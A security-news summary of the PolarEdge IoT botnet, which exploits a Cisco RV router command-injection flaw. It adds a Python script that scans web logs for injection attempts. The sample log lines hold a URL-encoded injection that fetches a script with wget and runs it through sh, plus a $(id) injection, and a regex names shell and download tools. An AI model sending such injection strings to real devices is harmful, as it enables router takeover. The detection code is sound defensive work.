Summary: PolarEdge is an IoT botnet that targets vulnerable Cisco Small Business routers and has infected more than 2,000 devices worldwide. It exploits CVE-2023-20118, a command-injection vulnerability in the routers' web management interface, to run commands on the device and drop a webshell for persistence. The operators delete logs to hide the compromise and have moved the implant's command channel to TLS, and the campaign has been expanding since at least late 2023.
Affected: Cisco Small Business Routers and other edge devices
Key points:
- Discovered by Sekoia's Threat Detection & Research team; the campaign actively targets Cisco routers.
- Exploits CVE-2023-20118, a command-injection flaw in the web management interface of end-of-life Cisco RV-series routers (RV016, RV042, RV042G, RV082, RV320, RV325), to run commands as root. Cisco has stated that exploitation requires valid administrator credentials and that no fix will be released, so exposed management interfaces on these models should be taken off the internet or the devices replaced.
- Uses evasion techniques, including deleting logs on the device and encrypting the command channel.
- Has a significant global footprint of more than 2,000 infected devices, most of them in the U.S.
- Has moved to a TLS-based backdoor implant for encrypted, persistent control.
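The page does not publish PolarEdge indicators, but the vulnerability class it names (command injection through a router's web management interface) is straightforward to hunt for in access logs. The following is an added example, not code from the Sekoia report or from the source article: it parses combined-format web log lines, URL-decodes the request path, and flags shell metacharacters and download/shell tool names in the query string. The log lines and the `/cgi-bin/mgmt.cgi` and `/cgi-bin/upload.cgi` paths are constructed for the example and are not real PolarEdge or Cisco paths. Because CVE-2023-20118 requires administrator credentials, a flagged request that also returned HTTP 200 is the one to escalate first; a 401 shows an attempt against an interface that should not have been reachable at all.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (combined log format). Hosts, paths and
# payloads are hypothetical and do not come from the PolarEdge report.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Feb/2025:09:12:01 +0000] "GET /cgi-bin/mgmt.cgi?page=status HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Feb/2025:09:12:05 +0000] "POST /cgi-bin/mgmt.cgi?name=a%3Bwget%20http%3A%2F%2F198.51.100.99%2Fx.sh%7Csh HTTP/1.1" 200 0 "-" "curl/7.88"
192.0.2.44 - - [10/Feb/2025:09:13:10 +0000] "GET /login.htm HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Feb/2025:09:13:12 +0000] "POST /cgi-bin/upload.cgi?f=%24%28id%29 HTTP/1.1" 401 0 "-" "curl/7.88"
"""

# Minimal combined-log parser: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell metacharacters that let an injected string break out of the
# command a CGI handler builds from user input.
META_RE = re.compile(r'(;|\|\||\||&&|`|\$\(|\$\{)')
# Tools typically used in the first stage of an IoT compromise to fetch
# and run a dropper on the device.
TOOL_RE = re.compile(r'\b(wget|curl|tftp|ftpget|busybox|nc|telnet|sh|bash)\b')


def parse_line(line):
    """Return a dict for one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def injection_indicators(raw_path):
    """URL-decode the request path (twice, to catch double encoding) and
    return (sorted list of suspicious tokens, decoded path)."""
    decoded = unquote_plus(unquote_plus(raw_path))
    hits = {m.group(1) for m in META_RE.finditer(decoded)}
    hits |= {m.group(1) for m in TOOL_RE.finditer(decoded)}
    return sorted(hits), decoded


def scan_lines(lines):
    """Return one finding per request whose decoded path carries
    command-injection indicators, preserving log order."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        indicators, decoded = injection_indicators(rec["path"])
        if indicators:
            findings.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "method": rec["method"],
                "path": decoded,
                "status": rec["status"],
                "indicators": indicators,
            })
    return findings


def successful_attempts(findings):
    """Findings where the server answered 200: on an authenticated
    command-injection bug these imply the attacker already had credentials."""
    return [f for f in findings if f["status"] == 200]


if __name__ == "__main__":
    found = scan_lines(SAMPLE_LOG.splitlines())
    for f in found:
        print(f"{f['ip']} {f['method']} {f['path']} -> {f['status']} {f['indicators']}")
    print("successful:", len(successful_attempts(found)))
```

The two regexes are deliberately broad; tune `TOOL_RE` to the interface you are monitoring, since a legitimate parameter value containing `sh` or `nc` will produce a hit that an analyst then discards on inspection.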
Source: https://securityonline.info/polaredge-botnet-2000-iot-devices-infected/